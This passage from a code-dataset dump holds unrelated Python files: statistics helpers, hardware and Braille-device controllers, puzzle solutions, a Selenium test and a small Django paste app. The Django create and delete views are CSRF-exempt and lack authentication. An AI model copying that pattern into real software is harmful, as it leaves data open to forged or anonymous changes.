pl_max_iter.\"\n )\n warnings.warn(warning_msg, ConvergenceWarning, stacklevel=2)\n bounds = np.column_stack([lower_bound, upper_bound])\n if len(lower_bound) < fitted_coef.shape[0]:\n ci = np.full([fitted_coef.shape[0], 2], np.nan)\n for idx, test_var_idx in enumerate(test_var_indices):\n ci[test_var_idx] = bounds[idx]\n return ci\n\n return bounds\n\n\ndef _wald_ci(coef, bse, alpha):\n lower_ci = coef + norm.ppf(alpha / 2) * bse\n upper_ci = coef + norm.ppf(1 - alpha / 2) * bse\n return np.column_stack([lower_ci, upper_ci])\n\n\ndef _wald_test(coef, bse):\n # 1 - pchisq((beta^2/vars), 1), in our case bse = vars^0.5\n return chi2.sf(np.square(coef) / np.square(bse), 1)\n\n\ndef load_sex2():\n \"\"\"\n Load the sex2 dataset from `logistf`.\n\n Returns\n -------\n X\n sex2 data as numpy array\n y\n sex2 `case` target column\n feature_names\n List of feature names\n\n References\n ----------\n Cytel Inc., (2010) LogXact 9 user manual, Cambridge, MA:Cytel Inc\n \"\"\"\n with open_text(\"firthlogist.datasets\", \"sex2.csv\") as sex2:\n X = np.loadtxt(sex2, skiprows=1, delimiter=\",\")\n y = X[:, 0]\n X = X[:, 1:]\n feature_names = [\"age\", \"oc\", \"vic\", \"vicl\", \"vis\", \"dia\"]\n return X, y, feature_names\n\n\ndef load_endometrial():\n \"\"\"\n Load the endometrial cancer dataset analyzed in Heinze and Schemper (2002). The data\n was originally provided by Dr E. Asseryanis from the Vienna University Medical\n School\n\n Returns\n -------\n X\n endometrial data as numpy array\n y\n endometrial `HG` target column\n feature_names\n List of feature names\n\n References\n ----------\n Agresti, A (2015). Foundations of Linear and Generalized Linear Models.\n Wiley Series in Probability and Statistics.\n\n Heinze G, Schemper M (2002). A solution to the problem of separation in logistic\n regression. Statistics in Medicine 21: 2409-2419.\n \"\"\"\n with open_text(\"firthlogist.datasets\", \"endometrial.csv\") as sex2:\n X = np.loadtxt(sex2, skiprows=1, delimiter=\",\")\n y = X[:, -1]\n X = X[:, :-1]\n feature_names = [\"NV\", \"PI\", \"EH\"]\n return X, y, feature_names\n","repo_name":"jzluo/firthlogist","sub_path":"firthlogist/firthlogist.py","file_name":"firthlogist.py","file_ext":"py","file_size_in_byte":18581,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"38"} +{"seq_id":"29950582035","text":"import serial\n\nfrom hydrabus_framework.utils.logger import Logger\nfrom hydrabus_framework.utils.hb_generic_cmd import hb_reset, hb_close, hb_connect\n\n\n__author__ = \"Jordan Ovrè \"\n\n\ndef reset_hb(hbf_instance):\n \"\"\"\n Return hydrabus into console mode.\n :param hbf_instance: Hydrabus framework instance (self).\n :return: Nothing.\n \"\"\"\n logger = Logger()\n hydrabus_cfg = hbf_instance.config['HYDRABUS']\n if hydrabus_cfg['port'] is None or hydrabus_cfg['port'] == '-':\n logger.handle('port is not set on the configuration (setc command)', Logger.ERROR)\n else:\n try:\n serial_instance = hb_connect(device=hydrabus_cfg['port'], baudrate=115200, timeout=1)\n except serial.SerialException as e:\n logger.handle(\"could not open port {!r}: {}\".format(hydrabus_cfg['port'], e), logger.ERROR)\n return\n except UserWarning as err:\n logger.handle(\"{}\".format(err), Logger.ERROR)\n return\n if isinstance(serial_instance, serial.Serial):\n hb_reset(serial_instance)\n hb_close(serial_instance)\n logger.handle(\"Reset sequence successfully sent to Hydrabus...\", Logger.SUCCESS)\n else:\n logger.handle(\"Unable to reset Hydrabus due to connection error...\", Logger.ERROR)\n","repo_name":"hydrabus-framework/framework","sub_path":"hydrabus_framework/core/command/reset_hb.py","file_name":"reset_hb.py","file_ext":"py","file_size_in_byte":1333,"program_lang":"python","lang":"en","doc_type":"code","stars":22,"dataset":"github-code","pt":"38"} +{"seq_id":"12972364587","text":"import logging\n\nimport time\n\nimport bspump\nimport bspump.common\nimport bspump.random\nimport bspump.trigger\n\n##\n\n\nL = logging.getLogger(__name__)\n\n\n##\n\n\nclass MyApplication(bspump.BSPumpApplication):\n\tdef __init__(self):\n\t\tsuper().__init__()\n\t\tsvc = self.get_service(\"bspump.PumpService\")\n\t\tsvc.add_pipeline(MyPipeline(self))\n\n\nclass MyPipeline(bspump.Pipeline):\n\tdef __init__(self, app, pipeline_id=None):\n\t\tsuper().__init__(app, pipeline_id)\n\t\tupper_bound = int(time.time())\n\t\tlower_bound = upper_bound - 100500\n\t\tself.build(\n\t\t\tbspump.random.RandomSource(app, self, choice=['a', 'b', 'c'], config={\n\t\t\t\t'number': 5\n\t\t\t}).on(bspump.trigger.OpportunisticTrigger(app, chilldown_period=10)),\n\n\t\t\tbspump.random.RandomEnricher(app, self, config={\n\t\t\t\t'field': '@timestamp',\n\t\t\t\t'lower_bound': lower_bound,\n\t\t\t\t'upper_bound': upper_bound\n\t\t\t}),\n\t\t\tbspump.common.PPrintProcessor(app, self),\n\t\t\tbspump.random.RandomDrop(app, self),\n\t\t\tbspump.common.PPrintSink(app, self)\n\t\t)\n\n\nif __name__ == '__main__':\n\tapp = MyApplication()\n\tapp.run()\n","repo_name":"LibertyAces/BitSwanPump","sub_path":"examples/bspump-random.py","file_name":"bspump-random.py","file_ext":"py","file_size_in_byte":1031,"program_lang":"python","lang":"en","doc_type":"code","stars":21,"dataset":"github-code","pt":"38"} +{"seq_id":"29539264897","text":"import math\nimport re\nfrom collections import defaultdict\nfrom itertools import combinations\nfrom operator import attrgetter\n\nfrom dataclasses import dataclass\n\n\n@dataclass(hash=True)\nclass Vector:\n x: int\n y: int\n z: int\n\n @property\n def distance(self):\n return abs(self.x) + abs(self.y) + abs(self.z)\n \n\ndef solve_quadratic(p1, p2, v1, v2, a1, a2):\n a = (a1 - a2) / 2\n b = (v1 - v2) + a\n c = p1 - p2\n discriminant = (b ** 2) - (4 * a * c)\n if discriminant < 0:\n # no solutions\n return ()\n if discriminant == 0:\n return (-b / (2 * a)),\n return (\n (-b + math.sqrt(discriminant)) / (2 * a),\n (-b - math.sqrt(discriminant)) / (2 * a)\n )\n\ndef solve_linear(p1, p2, v1, v2):\n return (p2 - p1) / (v1 - v2)\n\n\ndef solve(p1, p2, v1, v2, a1, a2):\n \"\"\"Find the positive integer points in time where P1 and P2 intersect\n \n Returns a set with points in time.\n \n \"\"\"\n if a1 == a2:\n ts = solve_linear(p1, p2, v1, v2),\n else:\n ts = solve_quadratic(p1, p2, v1, v2, a1, a2)\n return {int(round(t)) for t in ts if t > 0 and math.isclose(t, round(t))}\n\n\n@dataclass(hash=True)\nclass Particle:\n id: int\n p: Vector\n v: Vector\n a: Vector\n\n @classmethod\n def from_line(cls, idx, line, _d=re.compile(r'-?\\d+')):\n px, py, pz, vx, vy, vz, ax, ay, az = map(int, _d.findall(line))\n return cls(idx, Vector(px, py, pz), Vector(vx, vy, vz), Vector(ax, ay, az))\n \n def __and__(self, other):\n # find if two particles will collide in a future point in time\n solutions = None\n for c in 'xyz':\n p1, p2, v1, v2, a1, a2 = (\n getattr(getattr(ob, v), c) for v in 'pva'\n for ob in (self, other))\n if a1 == a2 and v1 == v2:\n # parallel paths, always matching if starting position is equal\n if p1 == p2:\n continue\n # positions not equal, will never cross\n return False, None\n if solutions is None:\n solutions = solve(p1, p2, v1, v2, a1, a2)\n else:\n solutions &= solve(p1, p2, v1, v2, a1, a2)\n if not solutions:\n return False, None\n return True, min(solutions)\n\n\ndef read_particles(lines):\n return [Particle.from_line(i, l) for i, l in enumerate(lines)]\n\n\ndef find_closest(particles):\n # Assumption: the lowest absolute acceleration and velocity will win\n return min(particles, key=lambda p: (p.a.distance, p.v.distance, p.p.distance))\n\n\ndef eliminate_collisions(particles):\n collisions = defaultdict(set)\n for p1, p2 in combinations(particles, 2):\n collide, time = p1 & p2\n if not collide:\n continue\n collisions[time] |= {p1, p2}\n\n eliminated = None\n for time, collided in sorted(collisions.items()):\n if not eliminated:\n eliminated = set(collided)\n else:\n for p1, p2 in combinations(collided - eliminated, 2):\n if (p1 & p2)[0]:\n eliminated |= {p1, p2}\n return len(particles) - len(eliminated)\n\ntest_particles = read_particles('''p=< 3,0,0>, v=< 2,0,0>, a=<-1,0,0>\np=< 4,0,0>, v=< 0,0,0>, a=<-2,0,0>\n'''.splitlines())\nassert find_closest(test_particles).id == 0\n\ntest_particles = read_particles('''p=<-6,0,0>, v=< 3,0,0>, a=< 0,0,0> \np=<-4,0,0>, v=< 2,0,0>, a=< 0,0,0>\np=<-2,0,0>, v=< 1,0,0>, a=< 0,0,0>\np=< 3,0,0>, v=<-1,0,0>, a=< 0,0,0>\n'''.splitlines())\nassert eliminate_collisions(test_particles) == 1\n\nwith open('inputs/day20.txt') as day20:\n particles = read_particles(day20)\n\nprint('Part 1:', find_closest(particles).id)\n\nprint('Part 2:', eliminate_collisions(particles))\n\n","repo_name":"mixmikmic/GH_code_analysis","sub_path":"python/Day 20.py","file_name":"Day 20.py","file_ext":"py","file_size_in_byte":3766,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"35322899393","text":"# Accepted\n\nqtd_alunos, min_pessoas = list(map(int, input().split()))\nhorario_alunos = list(map(int, input().split()))\n\nc = 0\nfor h in horario_alunos:\n if(h <= 0):\n c +=1\n\nif(c >= min_pessoas):\n print(\"YES\")\nelse:\n print(\"NO\")\n\n# c = 0\n# for h in horario_alunos:\n# if(h >= 0):\n# c +=1\n#\n# if(c >= min_pessoas):\n# print(\"YES\")\n# else:\n# print(\"NO\")\n","repo_name":"rafanthx13/competitive-programming","sub_path":"marathon-codes/Maratonas/SAP Contest/A.py","file_name":"A.py","file_ext":"py","file_size_in_byte":384,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"40812277395","text":"from CUBExceptions import *\nfrom component_control.Translator import *\nfrom BrailleKeyboard import main as bk_main\nimport logging\nimport multiprocessing as mp\nimport threading\nimport tty\nimport sys\nimport termios\n\nINPUT_MODES = [\"BKEYBOARD\", \"KEYBOARD\", \"FILE\"]\n\nFILE_LANGUAGES = [\"ENG\", \"UEB\", \"BKB\"]\n\n\nclass Input:\n \"\"\"Functional Class to represent input into the CUB Control system\n\n Attributes: mode - Mode of input selected for operation\n runFlag - Flag to pause and start input operation\n exit - Flag to signal the input thread to finish input\n cub_pipe - Pipe used by the CUB thread to communicate to the Input thread\n input_cub_pipe - Pipe used by the Input thread to communicate to the CUB thread\n BKeyboard_pipe - Pipe used by the Braille Keyboard process to communicate to the Input thread\n input_pipe_BKB - Pipe used by the Input thread to communicate to the Braille Keyboard process\n p_BKeyboard - Running process of the Braille keyboard input program\n f_stdin - File of the systems standard input\n terminal_old - Settings of the terminal before input mode was entered\n inFilename - File name of the input file for FILE input mode\n inFileLang - Language/Format of the input file (Allows for pre-translated Braille text files)\n inFile - File opened for file input\n inputlogFilename - File name of the logging file for the input characters\n inputlogFile - File opened for logging input characters\n translation_logFilename - File name of the logging file for the translated input characters\n translationlogFile - File opened for logging translated input characters\n\n Methods: thread_in() -\n start_input() - Sets the run Flag to true to enable the operation of the Input thread\n pause_input() - Sets the run Flag to false to pause the operation of the Input thread\n close() - Sets the exit flag to true to signal for the Input thread to close\n send() - Sends a message to the input thread\n recv() - Receives the oldest sent message from the input thread\n \"\"\"\n\n def __init__(self, input_mode=\"KEYBOARD\", filename=\"\", file_language=\"ENG\", inputlog=\"cub_input_log.txt\",\n translation_log=\"cub_translation_log.txt\"):\n \"\"\"Creates an abstraction object of the Embosser module for the CUB\n\n :param input_mode: Parameter to select the input mode to be used for input\n :param filename: Optional parameter to define the input file to read the characters from\n :param file_language: Optional parameter to select the language/format for the input file (default is English)\n :param inputlog: Optional parameter to select the logging file for the read input\n :param translation_log: Optional parameter to select the logging file for the translated input\n \"\"\"\n logging.info(f\"Setting up Input in mode: {input_mode}\")\n # Input mode to be ran, one of the items in INPUT_MODES\n self.mode = input_mode\n # Constructs the running thread to false, input waits until told to start taking input\n self.runFlag = threading.Event()\n # Sets exit flag to false, setting to true makes thread complete operation\n self.exit = False\n\n # Communication pipes:\n # cub_pipe is the CUBs pipe for communication with the input thread\n # BKeyboard_pipe is the Braille Keyboards pip for communication with the input thread\n # input_pipe_cub and input_pipe_BKeyboard is the Input thread pip for communication with the CUB and\n # Braille keyboard threads respectively\n self.cub_pipe, self.input_pipe_cub = mp.Pipe()\n self.BKeyboard_pipe, self.input_pipe_BKeyboard = mp.Pipe()\n # Braille keyboard process\n self.p_BKeyboard = None\n\n # File name for the Input File\n self.inFilename = filename\n # Format/Language of the Input file\n self.inFileLang = file_language\n # File attribute to store link to input file\n self.inFile = None\n\n # File name for the input logging file\n self.inputlogFilename = inputlog\n # Link to the input logging file\n self.inputlogFile = None\n # File name for the translated input logging file\n self.translation_logFilename = translation_log\n # Link to the translated input logging file\n self.translationlogFile = None\n\n # Get a pointer to the standard in system file\n self.f_stdin = sys.stdin.fileno()\n # Save a copy of terminal settings to be restored once input is complete\n self.terminal_old = termios.tcgetattr(self.f_stdin)\n\n def thread_in(self):\n \"\"\"Entry Point for the CUB Input component thread to begin execution\n\n :return: None\n \"\"\"\n try:\n logging.debug(\"Input thread Started\")\n # Run component startup procedure\n self.__startup()\n # Run component loop\n self.__run()\n\n except InitialisationError as err:\n self.close()\n self.__output_cub(f\"{err.component} ERROR: {err.message}\")\n except CUBClose as close:\n self.__output_cub(f\"Close Signalled from {close.exit_point} - {close.message}\")\n except CommunicationError as comm:\n self.close()\n self.__output_cub(f\"{comm.component} ERROR: {comm.message} - MSG: {comm.errorInput}\")\n except OperationError as op:\n self.close()\n self.__output_cub(f\"{op.component} ERROR: {op.message} - OP: {op.operation}\")\n except Exception as ex:\n self.__output_cub(f\"Undefined Input ERROR: {ex}\")\n finally:\n # Clean up\n if self.inFile is not None:\n self.inFile.close()\n termios.tcsetattr(self.f_stdin, termios.TCSADRAIN, self.terminal_old)\n\n # Notify CUB of closure\n self.__output_cub(\"END OF INPUT\")\n\n # Close Braille Keyboard process if still alive\n if self.p_BKeyboard is not None and self.p_BKeyboard.is_alive():\n self.input_pipe_BKeyboard.send(\"CLOSE\")\n self.p_BKeyboard.join(timeout=2)\n\n def __startup(self):\n \"\"\"Initialises Input functions depending on input mode\n\n :return:\n \"\"\"\n logging.info(\"Initialising input method\")\n try:\n self.inputlogFile = open(self.inputlogFilename, 'w')\n self.inputlogFile.write(\"Log file of the CUB Input\\n\")\n self.translationlogFile = open(self.translation_logFilename, 'w')\n self.inputlogFile.write(\"Log file of the CUB Translated Input\\n\")\n except IOError:\n raise InitialisationError(\"CUBInput\", f\"Unable to open file with name - {self.inFilename}\")\n # -----------\n # File Input\n # -----------\n if self.mode == \"FILE\" and self.inFilename is not \"\":\n try:\n self.inFile = open(self.inFilename, \"r\")\n logging.info(f\"CUBInput opened file with name {self.inFilename}\")\n except IOError:\n raise InitialisationError(\"CUBInput\", f\"Unable to open file with name - {self.inFilename}\")\n # -----------------\n # Braille Keyboard\n # -----------------\n elif self.mode == \"BKEYBOARD\":\n try:\n # Start Process at main function of BrailleKeyboard program\n self.p_BKeyboard = mp.Process(target=bk_main, kwargs={'pipe': self.BKeyboard_pipe})\n self.p_BKeyboard.start()\n logging.info(\"Connecting to Braille keyboard for input\")\n except AttributeError:\n raise InitialisationError(\"CUBInput\", \"Unable to start Braille Keyboard Process\")\n\n # ---------\n # Keyboard\n # ---------\n elif self.mode == \"KEYBOARD\":\n logging.info(\"Connecting to keyboard for input\")\n\n else:\n raise InitialisationError(\"CUBInput\", f\"Invalid Input Mode - {self.mode}\")\n self.__output_cub(\"ACK\")\n\n def __run(self):\n # Wait until main thread signals to begin input\n self.runFlag.wait()\n\n # Check if\n if not self.exit:\n if self.mode == \"KEYBOARD\":\n self.inputlogFile.write(\"Reading Input from Keyboard\\n\")\n self.inputlogFile.write(\"------------------------------\\n\")\n print(\"\\nKeyboard connected for input: type to print to the Curtin University Brailler\")\n print(\"To Exit, press ESC, CTRL-C or CTRL-Z\")\n print(\"-----------------------------------------------------------------------------\")\n tty.setraw(self.f_stdin)\n elif self.mode == \"FILE\":\n self.inputlogFile.write(f\"Reading Input from File: {self.inFilename}\\n\")\n self.inputlogFile.write(\"------------------------------\\n\")\n print(f\"Translating and outputting from file: {self.inFilename}\")\n print(\"Printing\", end='')\n sys.stdout.flush()\n\n logging.info(\"Starting Input Loop\")\n\n # Loop until exit flag is set\n while not self.exit:\n # Get input as a list of characters in braille cell notation\n in_chars = self.__take_input()\n logging.info(f\"Input from {self.mode} is: {in_chars}\")\n\n if in_chars[0] == \"END OF INPUT\":\n # Close Input, outputs end of input at close\n self.exit = True\n else:\n # Output each character to the Control System\n for char in in_chars:\n self.__output_cub(char)\n\n # Pause if flag is not set\n self.runFlag.wait()\n\n def __take_input(self):\n \"\"\"Takes the next input from the current input mode and returns it translated into CUB Braille Format\n\n :return: list of characters in CUB Braille format\n \"\"\"\n # Setup return list\n # Note: Must be list as calls to translate can convert a single character into\n # multiple braille characters i.e capital A is capital prefix followed by a\n chars = []\n\n # ---------\n # Keyboard\n # ---------\n if self.mode == \"KEYBOARD\":\n # Read input from keyboard via stdin\n char_raw = sys.stdin.read(1)\n # Write the input character to log file\n self.inputlogFile.write(char_raw)\n logging.debug(f\"Input retreived from Keyboard as : {char_raw}\")\n\n if char_raw == '\\x03' or char_raw == '\\x1a' or char_raw == '^C' or char_raw == '^Z' or char_raw == '\\x1b':\n # The input key was an exit key/combination\n logging.info(\"Keyboard triggered Shutdown\")\n raise CUBClose(\"Keyboard Input\", \"Keyboard Interrupt received\")\n # Translate the input into CUB Braille format (Language set for english keyboard)\n chars = translate(char_raw, \"ENG\")\n self.__log_input(chars)\n\n # -----------------\n # Braille Keyboard\n # -----------------\n elif self.mode == \"BKEYBOARD\":\n # Retrieve input from the braille keyboard pipe\n msg = self.__input_b_keyboard()\n logging.debug(f\"Input retreived from Braille Keyboard as : {msg}\")\n if msg == \"END OF INPUT\":\n # Input signals end of input\n chars = [msg]\n logging.info(\"Input Finished while reading\")\n else:\n self.inputlogFile.write(msg)\n # Translate the input to CUB Braille format\n chars = translate(msg, \"BKB\")\n self.__log_input(chars)\n\n # -----------\n # File Input\n # -----------\n elif self.mode == \"FILE\":\n line = self.inFile.readline()\n logging.debug(f\"Input retreived from File as : {line}\")\n if line == \"\":\n # Input signals end of input\n chars = [\"END OF INPUT\"]\n logging.info(\"Input Finished while reading\")\n else:\n self.inputlogFile.write(line)\n # Translate the input to CUB Braille format, grade two for full contractions\n chars = translate(line, self.inFileLang, grade=2)\n self.__log_input(chars)\n\n return chars\n\n def __log_input(self, chars):\n \"\"\"Logs the translated input characters into the translation log file\n\n :param chars: Input characters to be logged\n :return:\n \"\"\"\n # Write all translated characters to the log file\n for character in chars:\n self.translationlogFile.write(character + \" \")\n\n def pause_input(self):\n \"\"\"Sets the run Flag to false to pause the operation of the Input thread\n\n :return: None\n \"\"\"\n self.runFlag.clear()\n\n def start_input(self):\n \"\"\"Sets the run Flag to true to enable the operation of the Input thread\n\n :return: None\n \"\"\"\n self.runFlag.set()\n\n def close(self):\n \"\"\"Sets the exit flag to true to signal for the Input thread to close\n\n :return: None\n \"\"\"\n self.exit = True\n self.runFlag.set()\n\n def __output_cub(self, msg):\n \"\"\"Places the argument object into the output pipe to be received by another thread\n\n :param msg: Message to be output to another thread\n :return: None\n \"\"\"\n logging.debug(f\"CUBInput Sent message to CUB - {msg}\")\n self.input_pipe_cub.send(msg)\n\n def __input_cub(self):\n \"\"\"Returns the next message in the input pipe to be received from another thread\n\n :return: The object received from another thread\n \"\"\"\n msg = self.input_pipe_cub.recv()\n logging.debug(f\" CUBInput Received message from CUB - {msg}\")\n return msg\n\n def send(self, msg):\n \"\"\"Used by other threads to send a message to the input thread\n\n :param msg: Message to be input to the Head Traverser Thread\n :return: None\n \"\"\"\n self.cub_pipe.send(msg)\n\n def recv(self):\n \"\"\"Used by other threads to receive a message from the input thread\n\n :return: Message output by Head Traverser\n \"\"\"\n msg = self.cub_pipe.recv()\n logging.debug(f\"Cub received message from input - {msg}\")\n\n # Print to screen as progress indicator of file printing\n if self.mode == \"FILE\":\n print(\".\", end='')\n sys.stdout.flush()\n\n return msg\n\n def __input_b_keyboard(self):\n \"\"\"Returns the next message in the input pipe to be received from another thread\n\n :return: The object received from another thread\n \"\"\"\n return self.input_pipe_BKeyboard.recv()\n\n def __output_b_keyboard(self, msg):\n \"\"\"\n\n :param msg:\n :return:\n \"\"\"\n self.input_pipe_BKeyboard.send(msg)\n","repo_name":"Chertan/CUB_Control_Software","sub_path":"component_control/Input.py","file_name":"Input.py","file_ext":"py","file_size_in_byte":15381,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"10013334840","text":"import cgpt\nimport gpt\nimport numpy as np\nfrom gpt.core.foundation import tensor as foundation, base as foundation_base\n\n\nclass tensor(foundation_base):\n foundation = foundation\n\n def __init__(self, first, second=None):\n if second is not None:\n array, otype = first, second\n else:\n otype = first\n array = np.zeros(otype.shape, dtype=np.complex128)\n\n # allow to match compatible shapes\n if array.shape != otype.shape:\n array = np.reshape(array, otype.shape)\n\n self.array = np.ascontiguousarray(array)\n self.otype = otype\n assert self.array.shape == otype.shape\n\n def __repr__(self):\n return \"tensor(%s,%s)\" % (str(self.array), self.otype.__name__)\n\n def __getitem__(self, a):\n return self.array.__getitem__(a)\n\n def __setitem__(self, a, b):\n return self.array.__setitem__(a, b)\n\n def nfloats(self):\n return self.otype.nfloats\n\n def transposable(self):\n return self.otype.transposed is not None\n\n def transpose(self):\n if not self.transposable():\n return gpt.transpose(gpt.expr(self))\n return tensor(np.transpose(self.array, self.otype.transposed), self.otype)\n\n def conj(self):\n return tensor(self.array.conj(), self.otype)\n\n def copy(self):\n return tensor(np.copy(self.array), self.otype)\n\n def new(self):\n return tensor(np.zeros(shape=self.array.shape, dtype=self.array.dtype), self.otype)\n\n def adj(self):\n if not self.transposable():\n return gpt.adj(gpt.expr(self))\n return tensor(np.transpose(self.array.conj(), self.otype.transposed), self.otype)\n\n def reduced(self):\n if self.otype.data_otype() == gpt.ot_singlet:\n return complex(self.array)\n return self\n\n def trace(self, t):\n res = self\n if t & gpt.expr_unary.BIT_SPINTRACE:\n st = res.otype.spintrace\n assert st is not None and len(st) == 3 # do not yet support tracing vectors\n if st[0] is not None:\n res = tensor(np.trace(res.array, offset=0, axis1=st[0], axis2=st[1]), st[2]())\n if t & gpt.expr_unary.BIT_COLORTRACE:\n ct = res.otype.colortrace\n assert ct is not None and len(ct) == 3\n if ct[0] is not None:\n res = tensor(np.trace(res.array, offset=0, axis1=ct[0], axis2=ct[1]), ct[2]())\n\n if res.otype == gpt.ot_singlet:\n res = complex(res.array)\n return res\n\n def norm2(self):\n return np.linalg.norm(self.array) ** 2.0\n\n def __mul__(self, other):\n if isinstance(other, gpt.tensor):\n self_tag = self.otype.__name__\n other_tag = other.otype.__name__\n if other_tag in self.otype.mtab:\n mt = self.otype.mtab[other_tag]\n elif self_tag in other.otype.rmtab:\n mt = other.otype.rmtab[self_tag]\n a = np.tensordot(self.array, other.array, axes=mt[1])\n if len(mt) > 2:\n a = np.transpose(a, mt[2])\n return tensor(a, mt[0]())\n elif gpt.util.is_num(other):\n return tensor(self.array * complex(other), self.otype)\n elif isinstance(other, gpt.expr) and other.is_single(gpt.tensor):\n ue, uf, to = other.get_single()\n if ue == 0 and uf & gpt.factor_unary.BIT_TRANS != 0:\n tag = to.otype.__name__\n assert tag in self.otype.otab\n mt = self.otype.otab[tag]\n rhs = to.array\n if uf & gpt.factor_unary.BIT_CONJ != 0:\n rhs = rhs.conj()\n x = np.multiply.outer(self.array, rhs)\n for swp in mt[1]:\n x = np.swapaxes(x, swp[0], swp[1])\n return tensor(x, mt[0]())\n assert 0\n else:\n return other.__rmul__(self)\n\n def __rmul__(self, other):\n if gpt.util.is_num(other):\n return tensor(self.array * other, self.otype)\n else:\n return other.__mul__(self)\n\n def __add__(self, other):\n assert self.otype.__name__ == other.otype.__name__\n return tensor(self.array + other.array, self.otype)\n\n def __truediv__(self, other):\n return tensor(self.array / other, self.otype)\n\n def __neg__(self):\n return tensor(-self.array, self.otype)\n\n def __sub__(self, other):\n assert self.otype.__name__ == other.otype.__name__\n return tensor(self.array - other.array, self.otype)\n\n def __iadd__(self, other):\n assert self.otype.__name__ == other.otype.__name__\n self.array += other.array\n return self\n\n def __isub__(self, other):\n assert self.otype.__name__ == other.otype.__name__\n self.array -= other.array\n return self\n\n def __itruediv__(self, other):\n self.array /= other\n return self\n\n def __imatmul__(self, other):\n assert self.otype.__name__ == other.otype.__name__\n self.array = other.array.copy()\n return self\n","repo_name":"lehner/gpt","sub_path":"lib/gpt/core/tensor.py","file_name":"tensor.py","file_ext":"py","file_size_in_byte":5092,"program_lang":"python","lang":"en","doc_type":"code","stars":81,"dataset":"github-code","pt":"38"} +{"seq_id":"1875899290","text":"def print_urls(urls_list, file):\n with open(file, 'w') as File:\n for url in urls_list:\n print(url, file=File)\n\ndef id_to_url(file):\n with open(file, 'r') as url_file:\n content = url_file.read()\n ids = content.split('\\n')\n ids = list(filter(None, ids))\n url_format = \"https://www.leboncoin.fr/colocations/{}.htm/\"\n urls_list = [url_format.format(id_elem) for id_elem in ids]\n return urls_list\n\n\ndef print_links(link_list, file):\n id_list = []\n for link in link_list:\n link_id = link.split('/')[-2]\n link_id = link_id.replace('.htm', '')\n id_list.append(link_id)\n\n id_list = [int(id_x) for id_x in id_list]\n id_list.sort()\n new_file = open(file, \"w\")\n for id_elem in id_list:\n print(id_elem, file=new_file)\n new_file.close()\n","repo_name":"AbcSxyZ/GetHome-Leboncoin","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":834,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"37082431087","text":"from selenium import webdriver\nfrom selenium.webdriver.common.by import By\nimport time\nimport os \n\n\ntry: \n #даем браузеру ссылку\n link = \"http://suninjuly.github.io/file_input.html\"\n browser = webdriver.Chrome()\n browser.get(link)\n \n #заполняем поля\n first_name = browser.find_element(By.NAME, 'firstname')\n first_name.send_keys(\"Name\")\n\n second_name = browser.find_element(By.NAME, 'lastname')\n second_name.send_keys(\"LastName\")\n \n male = browser.find_element(By.NAME, 'email')\n male.send_keys(\"qq@qq.ru\")\n \n #добавляем файл\n current_dir = os.path.abspath(os.path.dirname(__file__)) #получаем путь к директории текущего исполняемого файла \n file_path = os.path.join(current_dir, 'text.txt') #добавляем к этому пути имя файла \n element = browser.find_element(By.ID, 'file') #задаем переменную для файла, т.е кнопку в которую он будет файл добавлять\n element.send_keys(file_path)\n \n #Сабмит кнопка\n button = browser.find_element(By.CLASS_NAME, 'btn btn-primary')\n button.click()\n \n # ждем прогрузки страницы\n time.sleep(1)\n \n\nfinally:\n # ожидание чтобы визуально оценить результаты прохождения скрипта\n time.sleep(10)\n # закрываем браузер после всех манипуляций\n browser.quit()","repo_name":"DenisKoptelov/stepik_auto_tests_course","sub_path":"block2_lesson2_step7.py","file_name":"block2_lesson2_step7.py","file_ext":"py","file_size_in_byte":1575,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"12201227507","text":"import sys\n\nimport pygame\nfrom OpenGL.GL import *\n\nclass ToolBox:\n toolbox = 0\n\n def __init__(self):\n self.toolbox = 1\n\n def loadTexture(self, image):\n textureSurface = pygame.image.load(image)\n textureSurface = pygame.transform.flip(textureSurface, False, True)\n textureData = pygame.image.tostring(textureSurface, \"RGBA\", 1)\n width = textureSurface.get_width()\n height = textureSurface.get_height()\n\n glEnable(GL_TEXTURE_2D)\n texid = glGenTextures(1)\n\n glBindTexture(GL_TEXTURE_2D, texid)\n glTexImage2D(GL_TEXTURE_2D, 0, GL_RGB, width, height, 0, GL_RGBA, GL_UNSIGNED_BYTE, textureData)\n\n glTexParameterf(GL_TEXTURE_2D, GL_TEXTURE_WRAP_T, GL_REPEAT)\n glTexParameterf(GL_TEXTURE_2D, GL_TEXTURE_WRAP_S, GL_REPEAT)\n glTexParameterf(GL_TEXTURE_2D, GL_TEXTURE_MAG_FILTER, GL_NEAREST)\n glTexParameterf(GL_TEXTURE_2D, GL_TEXTURE_MIN_FILTER, GL_NEAREST)\n\n return texid","repo_name":"Chubek/NegarinRuyeh","sub_path":"NegToolBox.py","file_name":"NegToolBox.py","file_ext":"py","file_size_in_byte":976,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"35177179405","text":"from django.shortcuts import render\nfrom django.contrib.auth.decorators import login_required\nfrom django.http import JsonResponse\nfrom django.views.decorators.csrf import csrf_exempt\nfrom .models import PasteText\n\n@login_required(login_url='/login/')\ndef paster(request):\n entries = PasteText.objects.order_by('-created')\n return render(request, 'paster/paster.html', {'entries' : entries})\n\n@csrf_exempt\ndef post_text(request):\n text = request.POST.get('to_save', None)\n created = PasteText.objects.create(text=text)\n data = {\n 'saved_text': created.text,\n 'saved_id' : created.id\n }\n return JsonResponse(data)\n\n@csrf_exempt\ndef delete_text(request):\n id = request.POST.get('to_delete', None)\n ret = PasteText.objects.get(id=id).delete()\n if ret[0] == 1:\n data = {'was_success': \"true\"}\n else:\n data = {'was_success': \"false\"}\n return JsonResponse(data)","repo_name":"pgilfillan/personal_site","sub_path":"paster/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":919,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"11069342755","text":"'''\nCreated on Aug 24, 2023\n\n@author: dan\n'''\n\nfrom argparse import ArgumentParser\nimport 